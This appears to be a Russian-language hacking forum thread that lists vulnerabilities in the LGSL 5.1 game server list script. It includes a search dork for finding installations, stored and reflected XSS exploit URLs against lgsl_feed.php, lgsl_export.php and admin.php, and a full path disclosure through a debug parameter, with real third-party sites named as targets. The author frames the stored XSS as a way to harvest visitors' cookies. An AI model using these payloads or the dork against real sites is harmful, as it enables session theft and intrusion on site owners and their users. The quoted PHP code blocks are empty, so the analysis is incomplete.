![]() |
Обзор уязвимостей LGSL 5.1
Продукт: LGSL 5.1 By Richard Perry
Описание: Live Game Server List Дорк: "LGSL 5.1 By Richard Perry" 1. aXSS активная xss существует из-за неправильной проверки переменной $request, передаваемой через GET. в /lgsl_files/lgsl_class.php если в значении переменной $request есть символ "а", то будет произведена запись в бд. PHP код:
/lgsl_files/lgsl_feed.php производится обрезание симола "а". PHP код:
exploit: Код:
/lgsl_files/lgsl_feed.php?type=rfactor&ip=bestserver<script>alert(1)</script>&c_port=2&q_port=32&s_port=4&request[]=5example: Код:
http://www.greycube.com/site/e107_plugins/lgsl/?s=1151Эта статистика ставится совместно с e107 0.7+, Joomla 1.5+, PHP Nuke и др (как написано в документации). Соответственно, можно получить многавкусныхкуков. 2. pXSS Код:
http://lgsl/lgsl_files/lgsl_export.php?output=%3Cscript%3Ealert(1)%3C/script%3EКод:
http://lgsl/lgsl_files/lgsl_feed.php?type=%3Cscript%3Ealert(/type/)%3C/script%3E&ip=1&c_port=2&q_port=3&s_port=4&request=5Код:
http://lgsl/lgsl_files/lgsl_feed.php?type[]=rfactor&ip=ip&c_port=2&q_port=32&s_port=4&request=5Код:
http://lgsl/lgsl_files/lgsl_feed.php?type=rfactor&ip[]=1&c_port=2&q_port=3&s_port=4&request=5 |
мигом посмотрел..
XSS /admin.php Код:
<form method='post' action='{$_SERVER['PHP_SELF']}' id='lgsl_admin_auth'>Код:
/admin.php/'><script>alert(document.cookie);</script>p.s.: 2. pXSS в lgsl_feed.php ксс можно произвести не только через п-тр type , но и через ip и через request Код:
/lgsl/lgsl_files/lgsl_feed.php?type=1&ip=<hr>&c_port=3&q_port=4&s_port=5&request=6&xml=7 |
3. Full path disclosure
доступен, из-за дебаг-режима lgsl\lgsl_files\lgsl_class.php: PHP код:
пример: Код:
http://www.oghf.org.uk/e107_plugins/lgsl/lgsl_files/lgsl_class.php?lgsl_debug=bl0 |
| Время: 12:57 |